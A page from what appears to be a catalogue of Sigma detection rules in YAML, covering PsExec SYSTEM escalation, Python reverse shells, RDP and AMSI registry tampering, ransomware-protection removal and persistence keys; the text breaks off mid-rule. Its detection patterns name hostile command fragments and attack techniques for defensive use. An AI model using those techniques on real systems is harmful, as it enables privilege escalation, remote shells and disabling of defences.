PsExec/PAExec Escalation to LOCAL SYSTEM
Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
view Sigma YAML
title: PsExec/PAExec Escalation to LOCAL SYSTEM
id: 8834e2f7-6b4b-4f09-8906-d2276470ee23
related:
- id: 207b0396-3689-42d9-8399-4222658efc99 # Generic rule based on similar cli flags
type: similar
status: test
description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
references:
- https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
- https://www.poweradmin.com/paexec/
- https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2021-11-23
modified: 2024-03-05
tags:
- attack.resource-development
- attack.t1587.001
logsource:
category: process_creation
product: windows
detection:
selection_sys: # Escalation to LOCAL_SYSTEM
CommandLine|contains|windash:
# Note that you don't need to add the ".exe" part when using psexec/paexec
# The "-" can also be replaced with "/"
# The order of args isn't important
# "cmd" can be replaced by "powershell", "pwsh" or any other console like software
- ' -s cmd'
- ' -s -i cmd'
- ' -i -s cmd'
# Pwsh (For PowerShell 7)
- ' -s pwsh'
- ' -s -i pwsh'
- ' -i -s pwsh'
# PowerShell (For PowerShell 5)
- ' -s powershell'
- ' -s -i powershell'
- ' -i -s powershell'
selection_other:
CommandLine|contains:
- 'psexec'
- 'paexec'
- 'accepteula'
condition: all of selection_*
falsepositives:
- Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)
- Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension
level: high
Convert to SIEM query
high
Moderate
High FP
Python Function Execution Security Warning Disabled In Excel
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
view Sigma YAML
title: Python Function Execution Security Warning Disabled In Excel
id: 023c654f-8f16-44d9-bb2b-00ff36a62af9
related:
- id: 17e53739-a1fc-4a62-b1b9-87711c2d5e44
type: similar
status: test
description: |
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
references:
- https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
author: '@Kostastsale'
date: 2023-08-22
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '\Microsoft\Office\'
- '\Excel\Security'
- 'PythonFunctionWarnings'
CommandLine|contains: ' 0'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
Python Function Execution Security Warning Disabled In Excel - Registry
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
view Sigma YAML
title: Python Function Execution Security Warning Disabled In Excel - Registry
id: 17e53739-a1fc-4a62-b1b9-87711c2d5e44
related:
- id: 023c654f-8f16-44d9-bb2b-00ff36a62af9
type: similar
status: test
description: |
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
references:
- https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327
author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale
date: 2024-08-23
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\Microsoft\Office\'
TargetObject|endswith: '\Excel\Security\PythonFunctionWarnings'
Details: 'DWORD (0x00000001)'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
Python One-Liners with Base64 Decoding - Linux
Detects the use of Python's base64 decoding functions in command line executions on Linux systems.
Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.
view Sigma YAML
title: Python One-Liners with Base64 Decoding - Linux
id: 55e862a8-dd9c-4651-807a-f21fcad56716
related:
- id: 50a0aa3d-ab16-4594-a8aa-5145a6e6792b
type: similar
status: experimental
description: |
Detects the use of Python's base64 decoding functions in command line executions on Linux systems.
Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is a common technique for obfuscation and evasion.
references:
- https://docs.python.org/3/library/base64.html
- https://www.virustotal.com/gui/file/bc43e925d7b4b74319f6e74e836a96f1997ba404e14ac566cf12a21e9da463db/behavior
- https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites
author: Hugh Ryan (HueCodes), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-03-09
tags:
- attack.execution
- attack.stealth
- attack.t1059.006
- attack.t1027.010
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|contains: '/python'
selection_cli:
CommandLine|contains|all:
- 'import'
- 'base64'
- ' -c'
CommandLine|contains:
- '.decode'
- 'b16decode'
- 'b32decode'
- 'b32hexdecode'
- 'b64decode'
- 'b85decode'
- 'z85decode'
condition: all of selection_*
falsepositives:
- Legitimate use of Python for decoding data, which is uncommon in typical enterprise environments but possible in development or data analysis contexts.
level: high
Convert to SIEM query
high
Moderate
High FP
Python Reverse Shell Execution Via PTY And Socket Modules
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
view Sigma YAML
title: Python Reverse Shell Execution Via PTY And Socket Modules
id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
related:
- id: c4042d54-110d-45dd-a0e1-05c47822c937
type: similar
status: test
description: |
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
references:
- https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-24
modified: 2024-11-04
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|contains: 'python'
CommandLine|contains|all:
- ' -c '
- 'import'
- 'pty'
- 'socket'
- 'spawn'
- '.connect'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
Python Spawning Pretty TTY on Windows
Detects python spawning a pretty tty
view Sigma YAML
title: Python Spawning Pretty TTY on Windows
id: 480e7e51-e797-47e3-8d72-ebfce65b6d8d
related:
- id: 899133d5-4d7c-4a7f-94ee-27355c879d90
type: derived
status: test
description: Detects python spawning a pretty tty
references:
- https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nextron Systems
date: 2022-06-03
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith:
- 'python.exe' # no \ bc of e.g. ipython.exe
- 'python3.exe'
- 'python2.exe'
selection_cli_1:
CommandLine|contains|all:
- 'import pty'
- '.spawn('
selection_cli_2:
CommandLine|contains: 'from pty import spawn'
condition: selection_img and 1 of selection_cli_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
High FP
Qakbot Regsvr32 Calc Pattern
Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
view Sigma YAML
title: Qakbot Regsvr32 Calc Pattern
id: 0033cf83-fb87-446d-9cac-43d63ad4d5a9
status: test
description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
references:
- https://github.com/pr0xylife/Qakbot/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-26
modified: 2024-03-05
tags:
- attack.execution
- detection.emerging-threats
- attack.stealth
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\regsvr32.exe'
CommandLine|contains|windash: ' -s'
CommandLine|endswith: ' calc'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Strong
Medium FP
RDP Sensitive Settings Changed
Detects tampering of RDP Terminal Service/Server sensitive settings.
Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
Below is a list of registry keys/values that are monitored by this rule:
- Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.
- DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.
- DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.
- fAllowUnsolicited: Allows unsolicited remote assistance offers.
- fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.
- InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.
- ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.
- SecurityLayer: Specifies the security layer used for RDP connections.
view Sigma YAML
title: RDP Sensitive Settings Changed
id: 3f6b7b62-61aa-45db-96bd-9c31b36b653c
related:
- id: 171b67e1-74b4-460e-8d55-b331f3e32d67
type: obsolete
- id: 41904ebe-d56c-4904-b9ad-7a77bdf154b3
type: obsolete
- id: a2863fbc-d5cb-48d5-83fb-d976d4b1743b
type: similar
status: test
description: |
Detects tampering of RDP Terminal Service/Server sensitive settings.
Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
Below is a list of registry keys/values that are monitored by this rule:
- Shadow: Used to enable Remote Desktop shadowing, which allows an administrator to view or control a user's session.
- DisableRemoteDesktopAntiAlias: Disables anti-aliasing for remote desktop sessions.
- DisableSecuritySettings: Disables certain security settings for Remote Desktop connections.
- fAllowUnsolicited: Allows unsolicited remote assistance offers.
- fAllowUnsolicitedFullControl: Allows unsolicited remote assistance offers with full control.
- InitialProgram: Specifies a program to run automatically when a user logs on to a remote computer.
- ServiceDll: Used in RDP hijacking techniques to specify a custom DLL to be loaded by the Terminal Services service.
- SecurityLayer: Specifies the security layer used for RDP connections.
references:
- http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/ # Contains description for most of the keys mentioned here (check it out if you want more information)
- http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/ # Related to the Shadow RPD technique
- https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services # Contains description for most of the keys mentioned here (check it out if you want more information)
- https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/
- https://blog.sekoia.io/darkgate-internals/
- https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/
- https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-63---disable-remote-desktop-anti-alias-setting-through-registry
- https://github.com/redcanaryco/atomic-red-team/blob/02c7d02fe1f1feb0fc7944550408ea8224273994/atomics/T1112/T1112.md#atomic-test-64---disable-remote-desktop-security-settings-through-registry
- https://github.com/redcanaryco/atomic-red-team/blob/dd526047b8c399c312fee47d1e6fb531164da54d/atomics/T1112/T1112.yaml#L790
- https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer
- https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html
- https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03 # Related to the Shadow RPD technique
- https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html # Related to RDP hijacking via the "ServiceDll" key
- https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html
author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
date: 2022-08-06
modified: 2025-11-22
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
category: registry_set
product: windows
detection:
selection_shadow:
TargetObject|contains:
- '\Control\Terminal Server\'
- '\Windows NT\Terminal Services\'
TargetObject|endswith: '\Shadow'
Details:
- 'DWORD (0x00000001)' # Full Control with user’s permission
- 'DWORD (0x00000002)' # Full Control without user’s permission
- 'DWORD (0x00000003)' # View Session with user’s permission
- 'DWORD (0x00000004)' # View Session without user’s permission
selection_terminal_services_key:
TargetObject|contains:
- '\Control\Terminal Server\'
- '\Windows NT\Terminal Services\'
TargetObject|endswith:
- '\DisableRemoteDesktopAntiAlias' # Disable anti-aliasing for remote desktop (DarkGate malware)
- '\DisableSecuritySettings' # Disable security settings, allowing access to programs/entire desktop (DarkGate malware)
- '\fAllowUnsolicited' # Allow unsolicited remote assistance offers
- '\fAllowUnsolicitedFullControl'
Details: 'DWORD (0x00000001)'
selection_tamper_only:
# Any changes to these keys should be suspicious and looked at
TargetObject|contains:
- '\Control\Terminal Server\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
- '\Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
- '\services\TermService\Parameters\ServiceDll' # RDP hijacking
- '\Terminal Server\WinStations\RDP-Tcp\SecurityLayer'
- '\Windows NT\Terminal Services\InitialProgram' # This value can be set to specify a program to run automatically when a user logs on to a remote computer.
filter_main_securitylayer_tls:
TargetObject|endswith: '\SecurityLayer'
Details: 'DWORD (0x00000002)' # TLS Enabled
condition: (selection_shadow or selection_terminal_services_key or selection_tamper_only) and not 1 of filter_main_*
falsepositives:
- Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
level: high
Convert to SIEM query
high
Strong
Medium FP
Raccine Uninstall
Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
view Sigma YAML
title: Raccine Uninstall
id: a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc
status: test
description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
references:
- https://github.com/Neo23x0/Raccine
author: Florian Roth (Nextron Systems)
date: 2021-01-21
modified: 2022-10-09
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection1:
CommandLine|contains|all:
- 'taskkill '
- 'RaccineSettings.exe'
selection2:
CommandLine|contains|all:
- 'reg.exe'
- 'delete'
- 'Raccine Tray'
selection3:
CommandLine|contains|all:
- 'schtasks'
- '/DELETE'
- 'Raccine Rules Updater'
condition: 1 of selection*
falsepositives:
- Legitimate deinstallation by administrative staff
level: high
Convert to SIEM query
high
Strong
Medium FP
Rar Usage with Password and Compression Level
Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
view Sigma YAML
title: Rar Usage with Password and Compression Level
id: faa48cae-6b25-4f00-a094-08947fef582f
status: test
description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
references:
- https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/
- https://ss64.com/bash/rar.html
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: '@ROxPinTeddy'
date: 2020-05-12
modified: 2022-03-16
tags:
- attack.collection
- attack.t1560.001
logsource:
category: process_creation
product: windows
detection:
selection_password:
CommandLine|contains: ' -hp'
selection_other:
CommandLine|contains:
- ' -m'
- ' a '
condition: selection_password and selection_other
falsepositives:
- Legitimate use of Winrar command line version
- Other command line tools, that use these flags
level: high
Convert to SIEM query
high
Strong
Medium FP
Raspberry Robin Initial Execution From External Drive
Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
view Sigma YAML
title: Raspberry Robin Initial Execution From External Drive
id: 2c6bea3a-ef58-4f2e-a775-4928f6b7c58a
related:
- id: d52d2e87-eb03-4fac-961d-eb616da79788
type: similar
status: test
description: Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE".
references:
- https://redcanary.com/blog/raspberry-robin/
author: '@kostastsale'
date: 2022-05-06
tags:
- attack.execution
- attack.t1059.001
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\cmd.exe'
ParentCommandLine|contains: '/r'
ParentCommandLine|endswith:
- '.bin'
- '.ico'
- '.lnk'
- '.lo'
- '.sv'
- '.usb'
selection_child_img:
Image|endswith: '\msiexec.exe'
CommandLine|contains|windash: '/q'
selection_child_http:
CommandLine|contains:
- 'http:'
- 'https:'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
Raspberry Robin Subsequent Execution of Commands
Detects raspberry robin subsequent execution of commands.
view Sigma YAML
title: Raspberry Robin Subsequent Execution of Commands
id: d52d2e87-eb03-4fac-961d-eb616da79788
related:
- id: 2c6bea3a-ef58-4f2e-a775-4928f6b7c58a
type: similar
status: test
description: Detects raspberry robin subsequent execution of commands.
references:
- https://redcanary.com/blog/raspberry-robin/
author: '@kostastsale'
date: 2022-05-06
tags:
- attack.execution
- attack.t1059.001
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\fodhelper.exe'
Image|endswith:
- '\rundll32.exe'
- '\regsvr32.exe'
CommandLine|contains|all:
- 'odbcconf.exe'
- 'regsvr'
- 'shellexec_rundll'
CommandLine|contains:
- 'installdriver'
- 'setfiledsndir'
- 'vkipdse'
CommandLine|endswith|windash:
- '/a'
- '/f'
- '/s'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
High FP
RedMimicry Winnti Playbook Registry Manipulation
Detects actions caused by the RedMimicry Winnti playbook
view Sigma YAML
title: RedMimicry Winnti Playbook Registry Manipulation
id: 5b175490-b652-4b02-b1de-5b5b4083c5f8
status: test
description: Detects actions caused by the RedMimicry Winnti playbook
references:
- https://redmimicry.com
author: Alexander Rausch
date: 2020-06-24
modified: 2021-11-27
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
product: windows
category: registry_event
detection:
selection:
TargetObject|contains: HKLM\SOFTWARE\Microsoft\HTMLHelp\data
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Moderate
Medium FP
Regedit as Trusted Installer
Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
view Sigma YAML
title: Regedit as Trusted Installer
id: 883835a7-df45-43e4-bf1d-4268768afda4
status: test
description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
references:
- https://twitter.com/1kwpeter/status/1397816101455765504
author: Florian Roth (Nextron Systems)
date: 2021-05-27
modified: 2022-10-09
tags:
- attack.privilege-escalation
- attack.t1548
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\regedit.exe'
ParentImage|endswith:
- '\TrustedInstaller.exe'
- '\ProcessHacker.exe'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Strong
Medium FP
Registry Disable System Restore
Detects the modification of the registry to disable a system restore on the computer
view Sigma YAML
title: Registry Disable System Restore
id: 5de03871-5d46-4539-a82d-3aa992a69a83
related:
- id: 7c06ab9b-b1d2-4ba9-b06e-09491ded20d9
type: similar
status: test
description: Detects the modification of the registry to disable a system restore on the computer
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry
author: frack113
date: 2022-04-04
modified: 2023-08-17
tags:
- attack.impact
- attack.t1490
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains:
- '\Policies\Microsoft\Windows NT\SystemRestore'
- '\Microsoft\Windows NT\CurrentVersion\SystemRestore'
TargetObject|endswith:
- DisableConfig
- DisableSR
Details: 'DWORD (0x00000001)'
condition: selection
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_disable_system_restore/info.yml
simulation:
- type: atomic-red-team
name: Disable System Restore Through Registry
technique: T1490
atomic_guid: 66e647d1-8741-4e43-b7c1-334760c2047f
Convert to SIEM query
high
Moderate
Medium FP
Registry Modification for OCI DLL Redirection
Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings.
Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service.
view Sigma YAML
title: Registry Modification for OCI DLL Redirection
id: c0e0bdec-3e3d-47aa-9974-05539c999c89
status: experimental
description: |
Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings.
Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service.
references:
- https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-01-24
tags:
- attack.persistence
- attack.privilege-escalation
- attack.execution
- attack.stealth
- attack.defense-impairment
- attack.t1112
- attack.t1574.001
logsource:
category: registry_set
product: windows
detection:
selection_ocilib:
TargetObject|endswith: '\SOFTWARE\Microsoft\MSDTC\MTxOCI\OracleOciLib'
filter_main_ocilib_file:
# it is looking when oci.dll name is changed to something else like evil.dll
Details|contains: 'oci.dll'
selection_ocilibpath:
TargetObject|endswith: '\SOFTWARE\Microsoft\MSDTC\MTxOCI\OracleOciLibPath'
filter_main_ocilibpath:
# it is looking when oci.dll path is changed to something else like 'C:\Windows\Temp\'
Details|contains: '%SystemRoot%\System32\'
condition: (selection_ocilib and not filter_main_ocilib_file) or (selection_ocilibpath and not filter_main_ocilibpath)
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Moderate
Medium FP
Registry Persistence via Explorer Run Key
Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
view Sigma YAML
title: Registry Persistence via Explorer Run Key
id: b7916c2a-fa2f-4795-9477-32b731f70f11
status: test
description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
references:
- https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/
author: Florian Roth (Nextron Systems), oscd.community
date: 2018-07-18
modified: 2023-12-11
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.001
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|endswith: '\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
Details|contains:
- ':\$Recycle.bin\'
- ':\ProgramData\'
- ':\Temp\'
- ':\Users\Default\'
- ':\Users\Public\'
- ':\Windows\Temp\'
- '\AppData\Local\Temp\'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
Registry Persistence via Service in Safe Mode
Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
view Sigma YAML
title: Registry Persistence via Service in Safe Mode
id: 1547e27c-3974-43e2-a7d7-7f484fb928ec
status: test
description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network
author: frack113
date: 2022-04-04
modified: 2025-10-22
tags:
- attack.stealth
- attack.t1564.001
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains:
- '\Control\SafeBoot\Minimal\'
- '\Control\SafeBoot\Network\'
TargetObject|endswith: '\(Default)'
Details: 'Service'
filter_optional_sophos:
Image: 'C:\WINDOWS\system32\msiexec.exe'
TargetObject|endswith:
- '\Control\SafeBoot\Minimal\SAVService\(Default)'
- '\Control\SafeBoot\Network\SAVService\(Default)'
filter_optional_mbamservice:
Image|endswith: '\MBAMInstallerService.exe'
TargetObject|endswith: '\MBAMService\(Default)'
Details: 'Service'
filter_optional_hexnode:
Image: 'C:\Hexnode\Hexnode Agent\Current\HexnodeAgent.exe'
TargetObject|endswith:
- '\Control\SafeBoot\Minimal\Hexnode Updater\(Default)'
- '\Control\SafeBoot\Network\Hexnode Updater\(Default)'
- '\Control\SafeBoot\Minimal\Hexnode Agent\(Default)'
- '\Control\SafeBoot\Network\Hexnode Agent\(Default)'
Details: 'Service'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml
simulation:
- type: atomic-red-team
name: Windows Add Registry Value to Load Service in Safe Mode without Network
technique: T1112
atomic_guid: 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5
- type: atomic-red-team
name: Windows Add Registry Value to Load Service in Safe Mode with Network
technique: T1112
atomic_guid: c173c948-65e5-499c-afbe-433722ed5bd4
Convert to SIEM query
high
Moderate
High FP
Remote Access Tool - AnyDesk Silent Installation
Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
view Sigma YAML
title: Remote Access Tool - AnyDesk Silent Installation
id: 114e7f1c-f137-48c8-8f54-3088c24ce4b9
status: test
description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
references:
- https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20
- https://support.anydesk.com/Automatic_Deployment
author: Ján Trenčanský
date: 2021-08-06
modified: 2023-03-05
tags:
- attack.command-and-control
- attack.t1219.002
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '--install'
- '--start-with-win'
- '--silent'
condition: selection
falsepositives:
- Legitimate deployment of AnyDesk
level: high
Convert to SIEM query
high
Moderate
Medium FP
Remote Access Tool - ScreenConnect Server Web Shell Execution
Detects potential web shell execution from the ScreenConnect server process.
view Sigma YAML
title: Remote Access Tool - ScreenConnect Server Web Shell Execution
id: b19146a3-25d4-41b4-928b-1e2a92641b1b
status: test
description: Detects potential web shell execution from the ScreenConnect server process.
references:
- https://blackpointcyber.com/resources/blog/breaking-through-the-screen/
- https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
author: Jason Rathbun (Blackpoint Cyber)
date: 2024-02-26
tags:
- attack.initial-access
- attack.t1190
logsource:
product: windows
category: process_creation
detection:
selection:
ParentImage|endswith: '\ScreenConnect.Service.exe'
Image|endswith:
- '\cmd.exe'
- '\csc.exe'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Strong
Medium FP
Remote XSL Execution Via Msxsl.EXE
Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
view Sigma YAML
title: Remote XSL Execution Via Msxsl.EXE
id: 75d0a94e-6252-448d-a7be-d953dff527bb
status: test
description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/
author: Swachchhanda Shrawan Poudel
date: 2023-11-09
tags:
- attack.stealth
- attack.t1220
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\msxsl.exe'
CommandLine|contains: 'http'
condition: selection
falsepositives:
- Msxsl is not installed by default and is deprecated, so unlikely on most systems.
level: high
Convert to SIEM query
high
Moderate
High FP
RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
view Sigma YAML
title: RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses
id: a6fc3c46-23b8-4996-9ea2-573f4c4d88c5
related:
- id: f65e22f9-819e-4f96-9c7b-498364ae7a25 # PS Classic
type: similar
- id: 38a7625e-b2cb-485d-b83d-aff137d859f4 # PS Module
type: similar
- id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 # PS ScriptBlock
type: similar
status: test
description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md
- https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
author: frack113
date: 2021-07-13
modified: 2023-05-09
tags:
- attack.stealth
- attack.t1218
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains:
- 'Invoke-ATHRemoteFXvGPUDisablementCommand'
- 'Invoke-ATHRemoteFXvGPUDisableme'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Strong
Medium FP
Removal Of AMSI Provider Registry Keys
Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
view Sigma YAML
title: Removal Of AMSI Provider Registry Keys
id: 41d1058a-aea7-4952-9293-29eaaf516465
status: test
description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
references:
